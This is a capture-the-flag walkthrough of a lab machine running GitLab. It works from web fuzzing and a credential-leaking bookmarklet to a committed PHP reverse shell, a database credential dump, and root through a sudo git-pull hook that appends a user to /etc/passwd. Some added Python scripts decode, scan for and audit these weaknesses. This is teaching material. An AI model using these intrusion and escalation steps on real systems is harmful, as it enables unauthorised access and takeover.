Difficulty: Medium
Technologies: Apache, Postgres, Gitlab
Vulnerabilities: Web fuzzing, Credentials in data files, sudo permissions
Walkthrough
Scan for open ports:
nmap -n -Pn -sS 10.10.10.114 -p -
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
The web server shows a GitLab login at http://10.10.10.114/users/sign_in (all other requests are redirected to it).
Additional fuzzing shows:
wfuzz -c -z file,/usr/share/wordlists/seclists/Discovery/Web-Content/big.txt --hc 404,302 http://10.10.10.114/FUZZ/
...
===================================================================
ID Response Lines Word Chars Payload
===================================================================
000000974: 401 0 L 10 W 49 Ch "MANIFEST.MF"
000001058: 401 0 L 10 W 49 Ch "Thumbs.db"
000001629: 401 0 L 10 W 49 Ch "access-log.1"
000001631: 401 0 L 10 W 49 Ch "access.1"
000001634: 401 0 L 10 W 49 Ch "access_log.1"
000002401: 400 3 L 10 W 90 Ch "användare"
000004557: 301 0 L 5 W 86 Ch "ci"
000004649: 200 307 L 956 W 15715 Ch "clave"
000007288: 200 247 L 790 W 13376 Ch "explore"
000007427: 301 0 L 5 W 169 Ch "favicon.ico"
000008843: 200 15 L 51 W 870 Ch "help"
000011348: 401 0 L 10 W 49 Ch "manifest.mf"
000011466: 401 0 L 10 W 49 Ch "master.passwd"
000014518: 200 170 L 350 W 4184 Ch "profile"
000014704: 200 248 L 796 W 13456 Ch "public"
000015551: 200 74 L 211 W 2153 Ch "robots.txt"
000015591: 200 307 L 956 W 15730 Ch "root"
000016010: 200 217 L 765 W 13074 Ch "search"
000016637: 401 4 L 15 W 125 Ch "sitemap.xml"
000017669: 401 0 L 10 W 49 Ch "tar.bz2"
000017670: 401 0 L 10 W 49 Ch "tar.gz"
000019490: 401 4 L 15 W 125 Ch "web.xml"
Browsing the pages we get to http://10.10.10.114/help/bookmarks.html, which contains an obfuscated JavaScript bookmarklet (decoded with https://www.unphp.net):
javascript:(function(){ var _0x4b18=["\x76\x61\x6C\x75\x65","\x75\x73\x65\x72\x5F\x6C\x6F\x67\x69\x6E","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x63\x6C\x61\x76\x65","\x75\x73\x65\x72\x5F\x70\x61\x73\x73\x77\x6F\x72\x64","\x31\x31\x64\x65\x73\x30\x30\x38\x31\x78"];document[_0x4b18[2]](_0x4b18[1])[_0x4b18[0]]= _0x4b18[3];document[_0x4b18[2]](_0x4b18[4])[_0x4b18[0]]= _0x4b18[5]; })()
javascript:(function(){ var _0x4b18=["value","user_login","getElementById","clave","user_password","11des0081x"];document[_0x4b18[2]](_0x4b18[1])[_0x4b18[0]]= _0x4b18[3];document[_0x4b18[2]](_0x4b18[4])[_0x4b18[0]]= _0x4b18[5]; })()
It seems we have found some login data: user clave, password 11des0081x.
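Bookmarklets like this one hide their intent behind a hex-escaped string table and index references, so an analyst normally resolves the table statically instead of running the script in a browser. The Python script below is an added example, not code from the original walkthrough: it decodes the \x-escaped string literals, substitutes every array reference, rewrites obj["prop"] as obj.prop, and then lists which form fields the bookmarklet writes into. The sample input is the obfuscated bookmarklet quoted above; the function and variable names are my own.

```python
import json
import re

# Constructed sample: the obfuscated bookmarklet quoted from bookmarks.html above.
SAMPLE = (
    r'javascript:(function(){ var _0x4b18=["\x76\x61\x6C\x75\x65","\x75\x73\x65\x72\x5F\x6C\x6F\x67\x69\x6E",'
    r'"\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x63\x6C\x61\x76\x65",'
    r'"\x75\x73\x65\x72\x5F\x70\x61\x73\x73\x77\x6F\x72\x64","\x31\x31\x64\x65\x73\x30\x30\x38\x31\x78"];'
    r'document[_0x4b18[2]](_0x4b18[1])[_0x4b18[0]]= _0x4b18[3];'
    r'document[_0x4b18[2]](_0x4b18[4])[_0x4b18[0]]= _0x4b18[5]; })()'
)

# A double-quoted JS string literal (body captured), a `var NAME=[ "...", ... ];` table,
# and the backslash escapes we need to resolve inside those literals.
STRING_LIT = r'"((?:[^"\\]|\\.)*)"'
ARRAY_DECL = re.compile(
    r'var\s+(?P<name>[A-Za-z_$][\w$]*)\s*=\s*\[(?P<body>(?:\s*"(?:[^"\\]|\\.)*"\s*,?)*)\]\s*;?'
)
ESCAPE = re.compile(r'\\(x[0-9a-fA-F]{2}|u[0-9a-fA-F]{4}|.)')
FIELD_ASSIGN = re.compile(r'getElementById\(\s*"([^"]*)"\s*\)\.value\s*=\s*"([^"]*)"')


def decode_js_string(body: str) -> str:
    """Resolve \\xHH, \\uHHHH and the common single-character escapes of a JS literal body."""
    simple = {"n": "\n", "t": "\t", "r": "\r", "0": "\0"}

    def repl(m):
        esc = m.group(1)
        if len(esc) > 1 and esc[0] in "xu":
            return chr(int(esc[1:], 16))
        return simple.get(esc, esc)

    return ESCAPE.sub(repl, body)


def deobfuscate(src: str) -> str:
    """Inline every string-table reference and drop the table declaration."""
    out = src
    for m in ARRAY_DECL.finditer(src):
        name = m.group("name")
        table = [decode_js_string(s) for s in re.findall(STRING_LIT, m.group("body"))]
        ref = re.compile(re.escape(name) + r"\[(\d+)\]")

        def resolve(r, table=table):
            idx = int(r.group(1))
            return json.dumps(table[idx]) if idx < len(table) else r.group(0)

        out = ref.sub(resolve, out)
        out = out.replace(m.group(0), "")  # the table is no longer referenced
    # obj["prop"] -> obj.prop so the DOM calls read naturally
    return re.sub(r'\["([A-Za-z_$][\w$]*)"\]', r".\1", out)


def form_fields_set(code: str) -> dict:
    """Map form-field id -> literal value that the (deobfuscated) script writes into it."""
    return {m.group(1): m.group(2) for m in FIELD_ASSIGN.finditer(code)}


def fields_that_look_like_secrets(fields: dict) -> list:
    """Field ids whose name suggests a credential is being pre-filled."""
    return sorted(k for k in fields if re.search(r"pass|pwd|secret|token", k, re.I))


if __name__ == "__main__":
    clean = deobfuscate(SAMPLE)
    print(clean)
    fields = form_fields_set(clean)
    secrets = fields_that_look_like_secrets(fields)
    for fid, val in fields.items():
        print(f"{fid} <- {val!r}" + (" (credential field)" if fid in secrets else ""))
```

The same three steps (decode escapes, inline the table, tidy member access) handle any script that uses this single-table obfuscation pattern, which is what most "string array" obfuscators emit; anything more elaborate (rotated tables, decoder functions) needs a real JS parser.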
Browsing through the GitLab instance we find two repositories, Profile and Deployer. It seems there are automatic hooks that deploy changes in Profile to the local machine. We commit a PHP reverse shell into the Profile repository and call it:
http://10.10.10.114/profile/rev.php
nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.10.14.29] from (UNKNOWN) [10.10.10.114] 57052
Linux bitlab 4.15.0-29-generic #31-Ubuntu SMP Tue Jul 17 15:39:52 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
14:18:01 up 1:22, 0 users, load average: 0.43, 0.26, 0.24
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty; pty.spawn("/bin/sh")'
$ id -a
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Browsing further we find a code snippet at http://10.10.10.114/snippets/1 containing some PostgreSQL credentials. We extend the script and upload it onto the server:
<?php
// Connect with the credentials from the snippet and dump the whole profiles table.
$db_connection = pg_connect("host=localhost dbname=profiles user=profiles password=profiles");
if (!$db_connection) {
    die("Connection failed");
}
$result = pg_query($db_connection, "SELECT * FROM profiles");
while ($row = pg_fetch_row($result)) {
    // the third column turns out to hold the (base64-encoded) password
    echo "ID: $row[0] User: $row[1] User: $row[2]";
    echo "<br />\n";
}
?>
http://10.10.10.114/profile/db.php
ID: 1 User: clave User: c3NoLXN0cjBuZy1wQHNz==
The password can be decoded using https://www.base64decode.org/
user: clave pass: c3NoLXN0cjBuZy1wQHNz== / ssh-str0ng-p@ss
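Both findings in this step, a libpq connection string with an embedded password committed to a public snippet and a base64-wrapped password sitting in a database column, are the kind of thing a repository or log scan should catch before anyone else does. The Python script below is an added example and not code from the walkthrough: it scans text for DSN-style user/password pairs and for base64 tokens that decode to printable text, tolerating the odd "==" padding seen above. The sample inputs are the snippet and the db.php output shown above; all function names are my own.

```python
import base64
import binascii
import re

# Constructed samples taken from the snippet and the db.php output above.
SNIPPET = (
    '<?php\n'
    '$db_connection = pg_connect("host=localhost dbname=profiles user=profiles password=profiles");\n'
    '$result = pg_query($db_connection, "SELECT * FROM profiles");\n'
)
PAGE_OUTPUT = "ID: 1 User: clave User: c3NoLXN0cjBuZy1wQHNz=="

# key=value connection strings: libpq DSNs, ADO-style strings, JDBC query parameters
DSN_RE = re.compile(
    r'''\b(?:user|username|uid)=(?P<user>[^\s"';&]+)[^"'\n]*?\b(?:password|pwd)=(?P<pw>[^\s"';&]+)''',
    re.IGNORECASE,
)
# a run of base64 alphabet characters (16+) with optional padding, not glued to other base64 chars
B64_RE = re.compile(r"(?<![A-Za-z0-9+/=])[A-Za-z0-9+/]{16,}={0,3}(?![A-Za-z0-9+/=])")


def decode_base64_lenient(token: str):
    """Decode a base64 token, tolerating missing or excess '=' padding; printable ASCII or None."""
    core = token.rstrip("=")
    core += "=" * (-len(core) % 4)
    try:
        raw = base64.b64decode(core, validate=True)
    except (binascii.Error, ValueError):
        return None
    try:
        text = raw.decode("ascii")
    except UnicodeDecodeError:
        return None
    return text if text.isprintable() and text.strip() else None


def find_dsn_credentials(text: str) -> list:
    """(user, password) pairs found in key=value connection strings."""
    return [(m.group("user"), m.group("pw")) for m in DSN_RE.finditer(text)]


def find_base64_secrets(text: str) -> list:
    """(token, decoded) pairs for base64 candidates that decode to readable text."""
    hits = []
    for m in B64_RE.finditer(text):
        decoded = decode_base64_lenient(m.group(0))
        if decoded is not None:
            hits.append((m.group(0), decoded))
    return hits


def scan(text: str) -> dict:
    """Run both detectors over one piece of text (a file, a snippet, a log line)."""
    return {"dsn": find_dsn_credentials(text), "base64": find_base64_secrets(text)}


if __name__ == "__main__":
    for label, sample in (("snippet", SNIPPET), ("db.php output", PAGE_OUTPUT)):
        print(label, scan(sample))
```

The base64 detector deliberately requires the decoded bytes to be printable ASCII: that keeps hex digests (like the flag hashes further down, which decode to binary garbage) out of the results while still catching obfuscated passwords.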
We are able to log in using these SSH credentials:
ben@kali:~$ ssh clave@10.10.10.114
clave@10.10.10.114's password:
Last login: Thu Oct 31 14:41:32 2019 from 10.10.14.29
clave@bitlab:~$ id -a
uid=1000(clave) gid=1000(clave) groups=1000(clave)
clave@bitlab:~$ ls
RemoteConnection.exe user.txt
clave@bitlab:~$ cat user.txt
1e3fd81ec3aa2f1462370ee3c20b8154
As user www-data we see the following sudo permissions:
$ sudo -l
Matching Defaults entries for www-data on bitlab:
env_reset, exempt_group=sudo, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on bitlab:
(root) NOPASSWD: /usr/bin/git pull
We create a git clone of the profile repository as clave and add a post-merge hook:
clave@bitlab:~$ /usr/lib/git-core/git clone /srv/docker/gitlab/gitlab/repositories/root/profile
Cloning into 'profile'...
done.
clave@bitlab:~/profile$ cat .git/hooks/post-merge
#!/bin/bash
echo "firefart:fijI1lDcvwk7k:0:0:pwned:/root:/bin/bash" >> /etc/passwd
We commit a change so the pull has something to merge, then run the pull via sudo from the www-data shell to trigger the hook:
$ cd /home/clave/profile
$ sudo /usr/bin/git pull
From /srv/docker/gitlab/gitlab/repositories/root/profile
7df1663..c6721d7 master -> origin/master
* [new branch] patch-11 -> origin/patch-11
Updating 7df1663..c6721d7
Fast-forward
index.php | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
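The root cause of this escalation is a sudo rule that lets a low-privileged account run /usr/bin/git pull as root without pinning it to a fixed repository, so whatever repository the caller is standing in supplies the hooks that git executes as root. The Python audit script below is an added example and not part of the walkthrough: it parses `sudo -l` output for root rules on commands whose behaviour is steered by files in the caller's working directory (git is the assumed starting list), and it walks a directory tree for hook scripts that git would actually run (executable, not *.sample). The sudo output is the one shown above; the demo repository is built in a temporary directory by the script itself with a benign hook; all names are mine.

```python
import os
import re
import tempfile

# Constructed sample: the `sudo -l` output for www-data shown above.
SUDO_L_OUTPUT = r"""Matching Defaults entries for www-data on bitlab:
    env_reset, exempt_group=sudo, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on bitlab:
    (root) NOPASSWD: /usr/bin/git pull
"""

# Assumption: commands that read hooks or configuration from the caller's working directory.
# git runs .git/hooks/* and honours the repository's own config. Extend for your environment.
HOOK_RUNNING_COMMANDS = {"git"}

# "(runas) TAG: TAG: command args" lines as printed by `sudo -l`
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmd>\S.*?)\s*$")


def parse_sudo_rules(text: str) -> list:
    """Turn the rule lines of `sudo -l` output into dicts; other lines are ignored."""
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue
        cmd = m.group("cmd")
        rules.append({
            "runas": m.group("runas").strip(),
            "nopasswd": "NOPASSWD:" in m.group("tags"),
            "command": cmd,
            "binary": os.path.basename(cmd.split()[0]),
        })
    return rules


def audit_sudo_rules(text: str) -> list:
    """Rules that run a hook-executing command as root (or ALL) and so inherit the caller's repo."""
    findings = []
    for rule in parse_sudo_rules(text):
        if rule["binary"] in HOOK_RUNNING_COMMANDS and re.search(r"\b(root|ALL)\b", rule["runas"]):
            rule["reason"] = (f"{rule['binary']} executes hooks/config from the caller's working "
                              "directory and the rule does not pin a repository path")
            findings.append(rule)
    return findings


def find_active_hooks(root: str) -> list:
    """Executable, non-sample files in any .git/hooks (clone) or *.git/hooks (bare) directory."""
    found = []
    for dirpath, _dirs, files in os.walk(root):
        parent, leaf = os.path.split(dirpath)
        if leaf != "hooks":
            continue
        if os.path.basename(parent) != ".git" and not parent.endswith(".git"):
            continue
        for name in files:
            if name.endswith(".sample"):
                continue  # git never runs the shipped samples
            path = os.path.join(dirpath, name)
            if os.stat(path).st_mode & 0o111:  # git ignores hooks without an exec bit
                found.append(path)
    return sorted(found)


def build_demo_repo() -> str:
    """Throwaway clone layout: one shipped sample hook and one active post-merge hook."""
    root = tempfile.mkdtemp(prefix="hook-audit-")
    hooks = os.path.join(root, "profile", ".git", "hooks")
    os.makedirs(hooks)
    with open(os.path.join(hooks, "post-merge.sample"), "w") as fh:
        fh.write("#!/bin/sh\n# shipped sample, never executed by git\n")
    active = os.path.join(hooks, "post-merge")
    with open(active, "w") as fh:
        fh.write("#!/bin/bash\necho 'post-merge hook ran'\n")  # benign stand-in for a real hook
    os.chmod(active, 0o755)
    return root


if __name__ == "__main__":
    for f in audit_sudo_rules(SUDO_L_OUTPUT):
        print(f"sudo: ({f['runas']}) {f['command']} [NOPASSWD={f['nopasswd']}] -> {f['reason']}")
    for hook in find_active_hooks(build_demo_repo()):
        print("active hook:", hook)
```

On a real host you would feed the script the output of `sudo -l -U <user>` for each account and point the hook walk at home directories and deployment roots; a rule like the one above should either be removed or replaced by a wrapper that hard-codes the repository path and runs with `core.hooksPath` pointed at a root-owned directory.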
It seems we have root:
clave@bitlab:~/profile$ su - firefart
Password:
root@bitlab:~# id -a
uid=0(root) gid=0(root) groups=0(root)
root@bitlab:~# cat root.txt
8d4cc131757957cb68d9a0cddccd587c